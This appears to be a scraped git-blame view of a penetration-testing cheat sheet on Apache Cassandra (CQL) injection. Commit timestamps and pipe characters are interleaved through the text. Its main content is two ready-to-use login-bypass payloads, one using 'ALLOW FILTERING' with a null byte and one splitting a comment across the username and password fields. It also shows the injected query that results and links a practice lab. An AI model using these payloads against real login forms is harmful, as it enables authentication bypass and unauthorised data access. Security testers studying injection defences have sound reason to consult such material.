2018-09-10 18:40:43 +00:00
|
|
|
|
# Cassandra Injection
|
|
|
|
|
|
|
|
|
|
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
|
|
|
|
|
|
2019-10-29 14:12:49 +00:00
|
|
|
|
## Summary
|
|
|
|
|
|
|
|
|
|
* [Cassandra comment](#cassandra-comment)
|
|
|
|
|
* [Cassandra - Login Bypass](#cassandra---login-bypass)
|
|
|
|
|
* [Login Bypass 0](#login-bypass-0)
|
|
|
|
|
* [Login Bypass 1](#login-bypass-1)
|
|
|
|
|
* [References](#references)
|
|
|
|
|
|
2018-09-10 18:40:43 +00:00
|
|
|
|
## Cassandra comment
|
|
|
|
|
|
|
|
|
|
```sql
|
|
|
|
|
/* Cassandra Comment */
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Cassandra - Login Bypass
|
|
|
|
|
|
|
|
|
|
### Login Bypass 0
|
|
|
|
|
|
|
|
|
|
```sql
|
|
|
|
|
username: admin' ALLOW FILTERING; %00
|
|
|
|
|
password: ANY
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
### Login Bypass 1
|
|
|
|
|
|
|
|
|
|
```sql
|
|
|
|
|
username: admin'/*
|
|
|
|
|
password: */and pass>'
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
The injection would look like the following SQL query
|
|
|
|
|
|
|
|
|
|
```sql
|
|
|
|
|
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)
|
|
|
|
|
|
2018-12-24 14:02:50 +00:00
|
|
|
|
## References
|
2018-09-10 18:40:43 +00:00
|
|
|
|
|
2019-10-29 14:12:49 +00:00
|
|
|
|
* [Injection In Apache Cassandra – Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)
|